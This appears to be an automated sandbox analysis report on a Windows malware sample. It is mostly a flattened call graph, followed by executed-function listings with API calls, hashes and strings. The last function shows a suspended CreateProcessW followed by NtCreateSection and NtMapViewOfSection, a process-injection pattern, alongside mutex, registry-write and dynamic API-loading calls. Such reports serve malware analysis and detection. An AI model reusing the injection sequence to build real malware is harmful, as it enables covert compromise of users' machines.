CreateDirectoryW 21371->21372 21373 40ef42 21372->21373 21374 42466a __snwprintf 102 API calls 21373->21374 21373->21377 21375 40ef8e CreateFileW 21374->21375 21376 40efbe WriteFile 21375->21376 21375->21377 21376->21377 21377->21031 21379 41bcd9 21378->21379 21661 41bd40 GetModuleHandleW 21378->21661 21379->21034 21381 416a3f 21380->21381 21382 40cb60 lstrlenW 21381->21382 21389 416a47 21381->21389 21383 416a5c 21382->21383 21383->21389 21672 415ed0 21383->21672 21386 416ab1 lstrcpyW 21387 416ace CreateFileW 21386->21387 21388 416b00 GetFileSize 21387->21388 21387->21389 21390 416b19 21388->21390 21391 416db2 21388->21391 21389->21039 21389->21044 21390->21391 21393 416b32 ReadFile 21390->21393 21391->21389 21392 416dc2 CloseHandle 21391->21392 21392->21389 21393->21391 21394 416b56 CloseHandle 21393->21394 21395 416b9f 21394->21395 21675 41f280 21395->21675 21397 416cd5 21397->21389 21397->21391 21398 416da1 VirtualFree 21397->21398 21398->21391 21399 416bf3 _memmove 21399->21391 21399->21397 21400 416c65 lstrcpyW lstrcpyW lstrcpyW 21399->21400 21400->21397 21401->21307 21402->21309 21403->21311 21404->21313 21405->21315 21406->21317 21407->21319 21408->21321 21416 425869 21415->21416 21417 42587e 21415->21417 21419 4283ae ___strgtold12_l 66 API calls 21416->21419 21418 4258a2 21417->21418 21420 42588d 21417->21420 21430 42aa71 21418->21430 21421 42586e 21419->21421 21422 4283ae ___strgtold12_l 66 API calls 21420->21422 21424 42835c ___strgtold12_l 11 API calls 21421->21424 21425 425892 21422->21425 21428 40eed3 21424->21428 21427 42835c ___strgtold12_l 11 API calls 21425->21427 21427->21428 21428->21371 21428->21377 21431 4254a4 _LocaleUpdate::_LocaleUpdate 76 API calls 21430->21431 21432 42aad8 21431->21432 21433 4283ae ___strgtold12_l 66 API calls 21432->21433 21434 42aadd 21433->21434 21435 42aae7 21434->21435 21451 42ab1e __snwprintf __aulldvrm _strlen 21434->21451 21474 42d04e 21434->21474 21436 4283ae ___strgtold12_l 66 API calls 21435->21436 21438 42aaec 21436->21438 21439 42835c ___strgtold12_l 11 API calls 21438->21439 21440 42aaf7 21439->21440 21441 4290cf __atodbl_l 5 API calls 21440->21441 21442 4258cf 21441->21442 21442->21428 21453 427410 21442->21453 21444 42574d _free 66 API calls 21444->21451 21445 42b189 DecodePointer 21445->21451 21446 42ecb1 78 API calls __cftof 21446->21451 21447 42d21e __malloc_crt 66 API calls 21447->21451 21448 42b1f2 DecodePointer 21448->21451 21449 42aa0f 97 API calls __snprintf 21449->21451 21450 42b213 DecodePointer 21450->21451 21451->21435 21451->21440 21451->21444 21451->21445 21451->21446 21451->21447 21451->21448 21451->21449 21451->21450 21452 42a9dc 97 API calls __snprintf 21451->21452 21481 42d443 21451->21481 21452->21451 21454 42d04e __fputwc_nolock 66 API calls 21453->21454 21455 427420 21454->21455 21456 427442 21455->21456 21457 42742b 21455->21457 21458 427453 __flswbuf 21456->21458 21459 427446 21456->21459 21460 4283ae ___strgtold12_l 66 API calls 21457->21460 21462 427430 21458->21462 21470 4274a9 21458->21470 21473 4274b4 21458->21473 21484 42ce43 21458->21484 21461 4283ae ___strgtold12_l 66 API calls 21459->21461 21460->21462 21461->21462 21462->21428 21463 427543 21465 42cd26 __write 97 API calls 21463->21465 21464 4274c3 21466 4274da 21464->21466 21468 4274f7 21464->21468 21465->21462 21496 42cd26 21466->21496 21468->21462 21521 42c53f 21468->21521 21470->21473 21493 42cdfa 21470->21493 21473->21463 21473->21464 21475 42d05a 21474->21475 21476 42d06f 21474->21476 21477 4283ae ___strgtold12_l 66 API calls 21475->21477 21476->21451 21478 42d05f 21477->21478 21479 42835c ___strgtold12_l 11 API calls 21478->21479 21480 42d06a 21479->21480 21480->21451 21482 4254a4 _LocaleUpdate::_LocaleUpdate 76 API calls 21481->21482 21483 42d456 21482->21483 21483->21451 21485 42ce50 21484->21485 21486 42ce5f 21484->21486 21487 4283ae ___strgtold12_l 66 API calls 21485->21487 21489 42ce7d 21486->21489 21490 4283ae ___strgtold12_l 66 API calls 21486->21490 21488 42ce55 21487->21488 21488->21470 21489->21470 21491 42ce70 21490->21491 21492 42835c ___strgtold12_l 11 API calls 21491->21492 21492->21488 21494 42d21e __malloc_crt 66 API calls 21493->21494 21495 42ce0f 21494->21495 21495->21473 21497 42cd32 _doexit 21496->21497 21498 42cd55 21497->21498 21499 42cd3a 21497->21499 21501 42cd61 21498->21501 21504 42cd9b 21498->21504 21546 4283c1 21499->21546 21503 4283c1 __write_nolock 66 API calls 21501->21503 21506 42cd66 21503->21506 21549 42effe 21504->21549 21505 4283ae ___strgtold12_l 66 API calls 21516 42cd47 _doexit 21505->21516 21508 4283ae ___strgtold12_l 66 API calls 21506->21508 21510 42cd6e 21508->21510 21509 42cda1 21511 42cdc3 21509->21511 21512 42cdaf 21509->21512 21513 42835c ___strgtold12_l 11 API calls 21510->21513 21515 4283ae ___strgtold12_l 66 API calls 21511->21515 21559 42c629 21512->21559 21513->21516 21518 42cdc8 21515->21518 21516->21462 21517 42cdbb 21618 42cdf2 21517->21618 21519 4283c1 __write_nolock 66 API calls 21518->21519 21519->21517 21522 42c54b _doexit 21521->21522 21523 42c578 21522->21523 21524 42c55c 21522->21524 21526 42c584 21523->21526 21530 42c5be 21523->21530 21525 4283c1 __write_nolock 66 API calls 21524->21525 21528 42c561 21525->21528 21527 4283c1 __write_nolock 66 API calls 21526->21527 21529 42c589 21527->21529 21531 4283ae ___strgtold12_l 66 API calls 21528->21531 21532 4283ae ___strgtold12_l 66 API calls 21529->21532 21533 42effe ___lock_fhandle 68 API calls 21530->21533 21539 42c569 _doexit 21531->21539 21534 42c591 21532->21534 21535 42c5c4 21533->21535 21536 42835c ___strgtold12_l 11 API calls 21534->21536 21537 42c5d2 21535->21537 21538 42c5ee 21535->21538 21536->21539 21540 42c4ba __lseeki64_nolock 68 API calls 21537->21540 21541 4283ae ___strgtold12_l 66 API calls 21538->21541 21539->21462 21543 42c5e3 21540->21543 21542 42c5f3 21541->21542 21544 4283c1 __write_nolock 66 API calls 21542->21544 21657 42c61f 21543->21657 21544->21543 21547 429215 __getptd_noexit 66 API calls 21546->21547 21548 4283c6 21547->21548 21548->21505 21550 42f00a _doexit 21549->21550 21551 42f064 21550->21551 21554 42d7f5 __lock 66 API calls 21550->21554 21552 42f086 _doexit 21551->21552 21553 42f069 EnterCriticalSection 21551->21553 21552->21509 21553->21552 21555 42f036 21554->21555 21556 42f03f InitializeCriticalSectionAndSpinCount 21555->21556 21558 42f052 21555->21558 21556->21558 21621 42f094 21558->21621 21560 42c638 __write_nolock 21559->21560 21561 42c66e 21560->21561 21562 42c68d 21560->21562 21592 42c663 21560->21592 21563 4283c1 __write_nolock 66 API calls 21561->21563 21565 42c6e9 21562->21565 21566 42c6cc 21562->21566 21564 4290cf __atodbl_l 5 API calls 21592->21564 21624 42d71c LeaveCriticalSection 21621->21624 21623 42f09b 21623->21551 21624->21623 21660 42f09d LeaveCriticalSection 21657->21660 21659 42c627 21659->21539 21660->21659 21662 4245f0 _memset 21661->21662 21663 41bd60 RegisterClassW 21662->21663 21664 41bda1 CreateWindowExW 21663->21664 21665 41bd90 GetLastError 21663->21665 21667 41be13 21664->21667 21668 41bdd8 GetMessageW 21664->21668 21665->21664 21666 41be2b 21665->21666 21667->21666 21671 41be19 UnregisterClassW 21667->21671 21669 41bdf1 TranslateMessage DispatchMessageW 21668->21669 21670 41be07 DestroyWindow 21668->21670 21669->21668 21670->21667 21671->21666 21673 40cb60 lstrlenW 21672->21673 21674 415ee4 21673->21674 21674->21386 21674->21389 21686 41fca0 LocalAlloc 21675->21686 21677 41f2c7 21680 41f489 21677->21680 21681 41f3ad LoadLibraryA 21677->21681 21683 41f2d3 21677->21683 21684 41f400 GetProcAddress 21677->21684 21685 41f436 GetProcAddress 21677->21685 21678 41f4cd VirtualFree 21679 41f4de 21678->21679 21679->21399 21693 41f900 LocalAlloc 21680->21693 21681->21677 21681->21683 21683->21678 21683->21679 21684->21677 21684->21683 21685->21677 21685->21683 21687 41fcfe 21686->21687 21688 41fd05 und_memcpy 21686->21688 21687->21677 21689 41fd2f VirtualAlloc 21688->21689 21690 41fd5d LocalFree 21689->21690 21691 41fd71 und_memcpy 21689->21691 21690->21687 21692 41ff3c LocalFree 21691->21692 21692->21687 21694 41f95e und_memcpy 21693->21694 21699 41f957 21693->21699 21695 41fc67 LocalFree 21694->21695 21696 41fba2 VirtualProtect 21694->21696 21695->21699 21697 41fbd9 21696->21697 21698 41fbcf 21696->21698 21697->21695 21698->21699 21700 41fc84 LocalFree 21698->21700 21699->21683 21700->21699 21702 40bcad __write_nolock 21701->21702 21703 418a30 5 API calls 21702->21703 21705 40bd27 21702->21705 21703->21702 21704 418da0 5 API calls 21704->21705 21705->21704 21706 40be3e 21705->21706 21707 40c4c3 21706->21707 21708 40fcb0 105 API calls 21706->21708 21709 40c031 21708->21709 21710 40fa70 103 API calls 21709->21710 21711 40c036 21710->21711 21712 40f950 103 API calls 21711->21712 21713 40c03b 21712->21713 21714 40f600 83 API calls 21713->21714 21715 40c045 21714->21715 21716 40cb60 lstrlenW 21715->21716 21719 40c06d _memset 21716->21719 21717 40c970 105 API calls 21718 40c165 _memset 21717->21718 21718->21707 21720 42466a __snwprintf 102 API calls 21718->21720 21719->21717 21721 40c1bc _memset 21720->21721 21721->21707 21722 42466a __snwprintf 102 API calls 21721->21722 21723 40c236 _memset 21722->21723 21723->21707 21724 40c38c 9 API calls 21723->21724 21725 406db0 2 API calls 21724->21725 21725->21707 21728 408676 21726->21728 21727 42466a __snwprintf 102 API calls 21727->21728 21728->21727 21729 408310 106 API calls 21728->21729 21730 40872b 21728->21730 21729->21728 21732 422125 21731->21732 21733 422648 21731->21733 21734 422135 OpenMutexW 21732->21734 21735 42214a 21732->21735 21734->21735 21736 42262e 21735->21736 21737 422171 OpenMutexW 21735->21737 21738 42216d 21735->21738 21739 422634 CloseHandle 21736->21739 21740 42263e CloseHandle 21736->21740 21737->21736 21742 422190 WaitForSingleObject 21737->21742 21741 4221b2 CreateEventW 21738->21741 21743 422614 21738->21743 21739->21740 21740->21733 21741->21743 21768 4221d2 21741->21768 21742->21738 21742->21741 21743->21736 21744 42261a ReleaseMutex CloseHandle 21743->21744 21744->21736 21745 4225a1 WaitForSingleObject 21747 4225b4 SetEvent WaitForSingleObject 21745->21747 21748 4225ca 21745->21748 21746 422244 WaitForSingleObject 21746->21745 21746->21768 21747->21748 21749 4225d0 CloseHandle 21748->21749 21750 4225e1 21748->21750 21749->21750 21753 4225e7 CloseHandle 21750->21753 21754 4225f8 21750->21754 21751 422267 WaitForSingleObject 21752 42229c Sleep WaitForSingleObject 21751->21752 21756 42227d WaitForSingleObject 21751->21756 21755 4222cd WaitForSingleObject 21752->21755 21752->21768 21753->21754 21757 4225fd CloseHandle 21754->21757 21758 422e80 4 API calls 21754->21758 21755->21768 21760 422295 21756->21760 21756->21768 21757->21743 21758->21757 21759 42222b 21759->21757 21760->21745 21761 42258a WaitForSingleObject 21761->21768 21763 422349 CreateEventW 21764 422364 LocalAlloc 21763->21764 21763->21768 21766 422506 CloseHandle 21764->21766 21767 42237b CreateThread 21764->21767 21765 422533 CloseHandle 21765->21768 21766->21768 21767->21768 21769 4223a7 GetTickCount 21767->21769 21945 422650 21767->21945 21768->21745 21768->21746 21768->21751 21768->21752 21768->21759 21768->21760 21768->21761 21768->21763 21768->21765 21768->21766 21770 4224fc LocalFree 21768->21770 21808 422f70 21768->21808 21774 4223ba ___crtGetLocaleInfoEx 21769->21774 21770->21766 21771 4223d0 WaitForSingleObject 21772 4223eb WaitForSingleObject 21771->21772 21771->21774 21773 422405 WaitForSingleObject 21772->21773 21772->21774 21773->21774 21774->21771 21774->21772 21775 4224b7 SetEvent WaitForSingleObject 21774->21775 21780 422491 Sleep 21774->21780 21781 42246e GetTickCount 21774->21781 21825 422e80 21775->21825 21779 4224e5 CloseHandle 21779->21768 21780->21774 21781->21774 21783 41c6d2 CreateMutexW 21782->21783 21798 41c6c8 21782->21798 21784 41c6f6 CreateEventW 21783->21784 21783->21798 21785 41c71c 21784->21785 21784->21798 21788 41c730 WaitForSingleObject 21785->21788 21786 41c984 LocalFree 21787 41c98e 21786->21787 21789 41c997 CloseHandle 21787->21789 21790 41c9ad 21787->21790 21791 41c749 WaitForMultipleObjects WaitForSingleObject 21788->21791 21788->21798 21789->21790 21792 41c9b6 CloseHandle 21790->21792 21793 41c9cd 21790->21793 21794 41c790 ReleaseMutex 21791->21794 21795 41c7a2 21791->21795 21792->21793 21796 41c9d6 CloseHandle 21793->21796 21797 41c9ed 21793->21797 21794->21798 21795->21798 21799 41c7d9 ReleaseMutex WaitForMultipleObjects WaitForSingleObject 21795->21799 21800 41c7ca ReleaseMutex 21795->21800 21801 42466a __snwprintf 102 API calls 21795->21801 21803 41c955 LocalFree Sleep 21795->21803 21804 41c8b9 WaitForMultipleObjects WaitForSingleObject 21795->21804 22045 41a780 21795->22045 22051 41ca00 LocalAlloc 21795->22051 21796->21797 21798->21786 21798->21787 21799->21795 21799->21798 21800->21795 21801->21795 21803->21788 21803->21798 21804->21795 21805 41c8fe ReleaseMutex 21804->21805 21805->21798 21809 422fde 21808->21809 21810 422f7f 21808->21810 21812 422feb WaitForMultipleObjects WaitForSingleObject 21809->21812 21819 4230e3 21809->21819 21842 423100 lstrlenW 21810->21842 21814 423024 ReleaseMutex 21812->21814 21815 423038 21812->21815 21813 422fae 21813->21809 21816 422fba lstrcpyA 21813->21816 21814->21819 21817 4230d5 ReleaseMutex 21815->21817 21818 42305b lstrcpyA ReleaseMutex 21815->21818 21815->21819 21816->21819 21821 4230d3 SetEvent 21817->21821 21820 423100 131 API calls 21818->21820 21819->21768 21822 4230aa 21820->21822 21821->21819 21822->21821 21824 4230b6 lstrcpyA 21822->21824 21824->21819 21828 422e8f 21825->21828 21826 4224e0 21832 414630 21826->21832 21827 422ec9 SetEvent 21827->21828 21828->21826 21828->21827 21829 422eeb WaitForSingleObject 21828->21829 21830 422f0f CloseHandle 21828->21830 21831 422f31 CloseHandle 21828->21831 21829->21828 21830->21828 21831->21828 21834 41463f 21832->21834 21833 41482e 21833->21779 21834->21833 21835 414682 21834->21835 21840 41477c 21834->21840 21836 4146d1 WaitForSingleObject CloseHandle 21835->21836 21837 414727 21835->21837 21836->21837 21838 414740 CloseHandle 21837->21838 21839 414777 21837->21839 21838->21839 21839->21779 21840->21833 21841 4147fe VirtualFree 21840->21841 21841->21833 21873 423520 21842->21873 21844 423133 21872 42346a und_memcpy 21844->21872 21877 4210c0 21844->21877 21848 4231ef 21848->21872 21899 421a20 21848->21899 21850 423222 21851 421da0 4 API calls 21850->21851 21850->21872 21852 423269 21851->21852 21853 421a20 4 API calls 21852->21853 21852->21872 21854 42329c 21853->21854 21855 421da0 4 API calls 21854->21855 21854->21872 21856 4232e3 21855->21856 21856->21872 21908 4237c0 21856->21908 21859 421da0 4 API calls 21860 42332e 21859->21860 21861 421a20 4 API calls 21860->21861 21860->21872 21872->21813 21875 423531 21873->21875 21874 42358e und_memcpy 21874->21844 21875->21874 21876 42356e wsprintfA 21875->21876 21876->21874 21881 4210d5 21877->21881 21878 421590 CloseHandle 21879 4210de 21878->21879 21879->21872 21890 421da0 21879->21890 21880 421112 21880->21878 21880->21879 21881->21878 21881->21879 21881->21880 21882 4214ca 21881->21882 21883 42152e 21881->21883 21926 4215c0 LocalAlloc 21882->21926 21883->21878 21932 421700 LocalAlloc 21883->21932 21887 42151a CloseHandle 21887->21879 21889 421581 CloseHandle 21889->21879 21891 421daf ___crtGetLocaleInfoEx 21890->21891 21896 421dca ___crtGetLocaleInfoEx 21890->21896 21891->21848 21892 421ebf 21892->21891 21893 4220d7 CloseHandle 21892->21893 21893->21891 21894 421e7f WaitForSingleObject 21894->21896 21895 421efc WaitForSingleObject 21895->21896 21896->21891 21896->21892 21896->21894 21896->21895 21898 422012 21896->21898 21897 422038 WaitForSingleObject 21897->21898 21898->21892 21898->21897 21900 421a2f ___crtGetLocaleInfoEx 21899->21900 21904 421a4a ___crtGetLocaleInfoEx 21899->21904 21900->21850 21901 421d75 CloseHandle 21901->21900 21902 421b0d WaitForSingleObject 21902->21904 21903 421b8a WaitForSingleObject 21903->21904 21904->21900 21904->21902 21904->21903 21905 421cb0 21904->21905 21907 421b4d 21904->21907 21906 421cd6 WaitForSingleObject 21905->21906 21905->21907 21906->21905 21907->21900 21907->21901 21909 4237d6 21908->21909 21910 4237e3 lstrcpyW 21909->21910 21911 4232f4 21909->21911 21912 423810 21910->21912 21911->21859 21911->21872 21912->21911 21913 423873 lstrlenW 21912->21913 21913->21911 21927 42150f 21926->21927 21929 421615 ___crtGetLocaleInfoEx 21926->21929 21927->21880 21927->21887 21928 4216ec LocalFree 21928->21927 21929->21928 21930 4216c9 und_memcpy 21929->21930 21931 4216db LocalFree 21930->21931 21931->21927 21933 421755 wsprintfA 21932->21933 21934 421576 21932->21934 21937 4217b4 ___crtGetLocaleInfoEx 21933->21937 21934->21878 21934->21889 21936 421850 LocalFree 21936->21934 21937->21936 21938 42182d und_memcpy 21937->21938 21939 42183f LocalFree 21938->21939 21939->21934 21967 422681 21945->21967 21946 4226c0 WaitForSingleObject 21947 422ca1 WaitForSingleObject 21946->21947 21946->21967 21947->21967 21948 422994 WaitForMultipleObjects 21949 42271b 21948->21949 21948->21967 21951 422e3b LocalFree 21949->21951 21953 422e17 CloseHandle 21949->21953 21950 422708 WaitForSingleObject 21950->21949 21950->21967 21953->21949 21954 422d43 CloseHandle 21954->21967 21955 422742 WaitForSingleObject 21955->21967 21956 4210c0 10 API calls 21956->21967 21957 422a1d WaitForSingleObject 21957->21949 21958 422a3a WaitForSingleObject 21957->21958 21958->21967 21959 421da0 WaitForSingleObject WaitForSingleObject WaitForSingleObject CloseHandle 21959->21967 21960 422c67 CloseHandle 21960->21967 21961 422abb CloseHandle 21961->21967 21962 421a20 WaitForSingleObject WaitForSingleObject WaitForSingleObject CloseHandle 21962->21967 21964 422b53 CloseHandle 21964->21967 21965 422c0b CloseHandle 21965->21967 21966 422baf CloseHandle 21966->21967 21967->21946 21967->21947 21967->21948 21967->21949 21967->21950 21967->21954 21967->21955 21967->21956 21967->21957 21967->21959 21967->21960 21967->21961 21967->21962 21967->21964 21967->21965 21967->21966 21968 422949 CloseHandle 21967->21968 21969 417d70 21967->21969 21968->21967 21970 417da2 21969->21970 21971 4180b2 21969->21971 21972 417deb 21970->21972 21973 417f2a WaitForSingleObject 21970->21973 22005 417ed7 ___crtGetLocaleInfoEx 21970->22005 21984 416a30 23 API calls 21971->21984 21996 418117 21971->21996 21975 417dfa CloseHandle 21972->21975 21976 417e1d 21972->21976 21974 417f48 21973->21974 21977 417f64 CloseHandle 21974->21977 21978 417f87 21974->21978 21974->22005 21975->21976 21979 417e2c CloseHandle 21976->21979 21980 417e4f CreateEventW 21976->21980 21977->21978 21981 417f96 CloseHandle 21978->21981 21982 417fb9 CreateEventW 21978->21982 21979->21980 21983 417e6a CreateThread 21980->21983 21980->22005 21981->21982 21985 417fd4 CreateThread 21982->21985 21982->22005 21986 417eeb CloseHandle 21983->21986 21987 417e9b ResumeThread 21983->21987 21988 41810b 21984->21988 21989 418054 CloseHandle 21985->21989 21990 418004 ResumeThread 21985->21990 21986->22005 21991 417ee1 CloseHandle 21987->21991 21987->22005 21988->21996 22018 4173d0 21988->22018 21989->22005 21994 41804a CloseHandle 21990->21994 21990->22005 21991->21986 21992 418236 22032 4184f0 21992->22032 21994->21989 21996->21992 21997 418264 21996->21997 21996->22005 21998 4182b7 21997->21998 21999 418398 WaitForSingleObject 21997->21999 21997->22005 22000 4182c0 CloseHandle 21998->22000 22001 4182d7 21998->22001 22002 4183b0 21999->22002 22000->22001 22003 4182e0 CloseHandle 22001->22003 22004 4182f7 CreateEventW 22001->22004 22002->22005 22006 4183c6 CloseHandle 22002->22006 22007 4183dd 22002->22007 22003->22004 22004->22005 22010 41830e CreateThread 22004->22010 22005->21967 22006->22007 22008 4183e6 CloseHandle 22007->22008 22009 4183fd CreateEventW 22007->22009 22008->22009 22009->22005 22011 418414 CreateThread 22009->22011 22012 41836b CloseHandle 22010->22012 22013 41832d ResumeThread 22010->22013 22014 418471 CloseHandle 22011->22014 22015 418433 ResumeThread 22011->22015 22012->22005 22013->22005 22016 418361 CloseHandle 22013->22016 22014->22005 22015->22005 22017 418467 CloseHandle 22015->22017 22016->22012 22017->22014 22019 4173e2 22018->22019 22020 40cb60 lstrlenW 22019->22020 22031 4173ea 22019->22031 22021 4173ff 22020->22021 22022 415ed0 lstrlenW 22021->22022 22021->22031 22023 41742e 22022->22023 22024 417454 lstrcpyW 22023->22024 22023->22031 22025 417471 _memset 22024->22025 22026 42466a __snwprintf 102 API calls 22025->22026 22027 4174b0 22026->22027 22028 41f280 12 API calls 22027->22028 22027->22031 22029 417624 _memmove 22028->22029 22030 4176b4 lstrcpyW lstrcpyW lstrcpyW 22029->22030 22029->22031 22030->22031 22031->21996 22033 418511 22032->22033 22034 41851b WaitForSingleObject 22033->22034 22043 4185f3 22033->22043 22035 41853a 22034->22035 22036 418573 22035->22036 22037 41855c CloseHandle 22035->22037 22035->22043 22038 418593 CreateEventW 22036->22038 22039 41857c CloseHandle 22036->22039 22037->22036 22040 4185aa CreateThread 22038->22040 22038->22043 22039->22038 22041 418604 CloseHandle 22040->22041 22042 4185c9 ResumeThread 22040->22042 22041->22043 22042->22043 22044 4185fa CloseHandle 22042->22044 22043->22005 22044->22041 22046 41a7f9 _memset 22045->22046 22050 41a7f2 22045->22050 22046->22050 22066 426e92 22046->22066 22049 426e92 67 API calls 22049->22050 22050->21795 22052 41c941 ReleaseMutex 22051->22052 22053 41ca22 _memmove 22051->22053 22052->21803 22054 41ca61 22053->22054 22055 41ca50 LocalFree 22053->22055 22056 41cb11 22054->22056 22058 41ca83 22054->22058 22055->22052 22057 4270ea __wcstoi64 79 API calls 22056->22057 22059 41cb1e lstrcpyA LocalFree 22057->22059 22060 41caa7 22058->22060 22061 41ca96 LocalFree 22058->22061 22059->22052 22062 41cadb lstrcpyA 22060->22062 22063 41cacd LocalFree 22060->22063 22061->22052 22089 4270ea 22062->22089 22063->22052 22067 426e7c 22066->22067 22070 42b83b 22067->22070 22073 42b679 22070->22073 22077 42b68b 22073->22077 22074 42b691 22075 4283ae ___strgtold12_l 66 API calls 22074->22075 22078 42b696 22075->22078 22076 42b6ba 22082 42b6d6 wcstoxl 22076->22082 22084 42e3a3 22076->22084 22077->22074 22077->22076 22079 42835c ___strgtold12_l 11 API calls 22078->22079 22083 41aac1 22079->22083 22081 4283ae ___strgtold12_l 66 API calls 22081->22083 22082->22081 22082->22083 22083->22049 22083->22050 22085 42e3b4 22084->22085 22086 42e3b8 22084->22086 22085->22076 22087 42e3d3 GetStringTypeW 22086->22087 22088 42e3c3 22086->22088 22087->22088 22088->22076 22090 427103 22089->22090 22093 426ebf 22090->22093 22094 4254a4 _LocaleUpdate::_LocaleUpdate 76 API calls 22093->22094 22096 426ed3 22094->22096 22095 426ee3 22097 4283ae ___strgtold12_l 66 API calls 22095->22097 22096->22095 22101 426f19 22096->22101 22098 426ee8 22097->22098 22099 42835c ___strgtold12_l 11 API calls 22098->22099 22104 41caf6 LocalFree 22099->22104 22102 426f60 22101->22102 22105 42b855 22101->22105 22103 4283ae ___strgtold12_l 66 API calls 22102->22103 22102->22104 22103->22104 22104->22052 22106 4254a4 _LocaleUpdate::_LocaleUpdate 76 API calls 22105->22106 22107 42b869 22106->22107 22108 42d443 __isleadbyte_l 76 API calls 22107->22108 22111 42b876 22107->22111 22109 42b89e 22108->22109 22110 42de56 ___crtGetStringTypeA 79 API calls 22109->22110 22110->22111 22111->22101 22113 42466a __snwprintf 102 API calls 22112->22113 22114 404592 22113->22114 22114->21055 22115 404610 22114->22115 22116 404635 _memset 22115->22116 22117 42466a __snwprintf 102 API calls 22116->22117 22118 4045a8 22117->22118 22118->21055 22118->21058 22120 41bcfc PostMessageW 22119->22120 22121 41bd0e 22119->22121 22120->22121 22122 417d69 22121->22122 22123 41bd17 WaitForSingleObject CloseHandle 22121->22123 22122->20758 22122->20759 22123->22122 22125 42466a __snwprintf 102 API calls 22124->22125 22126 408174 RegOpenKeyExW 22125->22126 22127 408198 RegSetValueExW 22126->22127 22128 4081b5 22126->22128 22127->22128 22128->20850 22130 406c2b 22129->22130 22131 41d67b GetFileSize 22129->22131 22130->20853 22130->20856 22132 41d690 LocalAlloc 22131->22132 22133 41d6ea CloseHandle 22131->22133 22132->22133 22134 41d6a5 ReadFile 22132->22134 22133->22130 22135 41d6c1 22134->22135 22136 41d6e0 LocalFree 22134->22136 22135->22136 22137 41d6c9 CloseHandle 22135->22137 22136->22133 22137->22130 22139 4254a4 _LocaleUpdate::_LocaleUpdate 76 API calls 22138->22139 22140 427671 22139->22140 22141 4283ae ___strgtold12_l 66 API calls 22140->22141 22142 427676 22141->22142 22143 427684 22142->22143 22158 4276b2 __snwprintf __aulldvrm _strlen 22142->22158 22144 4283ae ___strgtold12_l 66 API calls 22143->22144 22145 427689 22144->22145 22147 42835c ___strgtold12_l 11 API calls 22145->22147 22146 427694 22148 4290cf __atodbl_l 5 API calls 22146->22148 22147->22146 22149 4246f7 22148->22149 22149->20886 22149->20887 22149->20888 22150 427ccf DecodePointer 22150->22158 22151 42574d _free 66 API calls 22151->22158 22152 4275a3 99 API calls __snwprintf 22152->22158 22153 42d443 __isleadbyte_l 76 API calls 22153->22158 22154 42d313 78 API calls __fassign 22154->22158 22155 42d21e __malloc_crt 66 API calls 22155->22158 22156 42816d 22159 4283ae ___strgtold12_l 66 API calls 22156->22159 22157 427574 99 API calls __snwprintf 22157->22158 22158->22146 22158->22150 22158->22151 22158->22152 22158->22153 22158->22154 22158->22155 22158->22156 22158->22157 22160 427d3c DecodePointer 22158->22160 22162 427d5e DecodePointer 22158->22162 22161 428172 22159->22161 22160->22158 22163 42835c ___strgtold12_l 11 API calls 22161->22163 22162->22158 22163->22146 22239 40f3f5 _memset 22238->22239 22240 40d80d 22239->22240 22241 41d650 7 API calls 22239->22241 22240->21003 22240->21014 22241->22240 22245 42a608 22242->22245 22244 42a76f 22246 42a614 _doexit 22245->22246 22247 42d7f5 __lock 61 API calls 22246->22247 22248 42a61b 22247->22248 22249 42a646 DecodePointer 22248->22249 22255 42a6c5 22248->22255 22251 42a65d DecodePointer 22249->22251 22249->22255 22264 42a670 22251->22264 22253 42a742 _doexit 22253->22244 22268 42a733 22255->22268 22256 42a72a 22258 42a4f0 _fast_error_exit 3 API calls 22256->22258 22259 42a733 22258->22259 22260 42a740 22259->22260 22273 42d71c LeaveCriticalSection 22259->22273 22260->22244 22261 42a687 DecodePointer 22267 4290de EncodePointer 22261->22267 22264->22255 22264->22261 22265 42a696 DecodePointer DecodePointer 22264->22265 22266 4290de EncodePointer 22264->22266 22265->22264 22266->22264 22267->22264 22269 42a739 22268->22269 22271 42a713 22268->22271 22274 42d71c LeaveCriticalSection 22269->22274 22271->22253 22272 42d71c LeaveCriticalSection 22271->22272 22272->22256 22273->22260 22274->22271

                          Executed Functions

                          Function 00419140 Relevance: 125.2, APIs: 51, Strings: 20, Instructions: 993libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryW.KERNEL32(NTDLL.DLL), ref: 0041914E
                          • GetProcAddress.KERNEL32(00000000,?), ref: 004191B1
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: 5$ADVAPI32.DLL$CRYPT32.DLL$DBGHELP.DLL$GDI32.DLL$GDIPLUS.DLL$H$KERNEL32.DLL$MSI.DLL$NTDLL.DLL$OLE32.DLL$SECUR32.DLL$SHELL32.DLL$SHLWAPI.DLL$USER32.DLL$WINHTTP.DLL$WINMM.DLL$WS2_32.DLL$WTSAPI32.DLL$n
                          • API String ID: 2574300362-974314553
                          • Opcode ID: e3e430002b83255cd6f266c08fed002abc7ad3ddd8e6806b3d6c52b59139a0f8
                          • Instruction ID: 5af6799f9cb66f22ec2950afe87d39a47128ff56e9053586588cc2c6fa206a1d
                          • Opcode Fuzzy Hash: e3e430002b83255cd6f266c08fed002abc7ad3ddd8e6806b3d6c52b59139a0f8
                          • Instruction Fuzzy Hash: 8AA23774A05218EFCB14CF64DC94BEAB7B5BB48305F1054AAE50AA3340D778AEC1CF5A
                          Function 00410D50 Relevance: 109.0, APIs: 44, Strings: 18, Instructions: 544nativestringprocessCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00410D69
                          • _memset.LIBCMT ref: 00410D86
                            • Part of subcall function 00401C50: _wcsrchr.LIBCMT ref: 00401C5C
                          • _memset.LIBCMT ref: 00410DC0
                          • CreateProcessW.KERNELBASE(0047BCD2,00000000,00000000,00000000,00000000,00000004,00000000,?,00000044,?), ref: 00410E0A
                          • NtCreateSection.NTDLL(00000000,00000006,00000000,000005F0,00000004,08000000,00000000), ref: 00410E8B
                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,000005F0,00000002,00000000,00000004), ref: 00410ED2
                          • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 00410EE0
                          • NtMapViewOfSection.NTDLL(00000000,?,00000000,00000000,00000000,00000000,000005F0,00000002,00000000,00000004), ref: 00410F2B
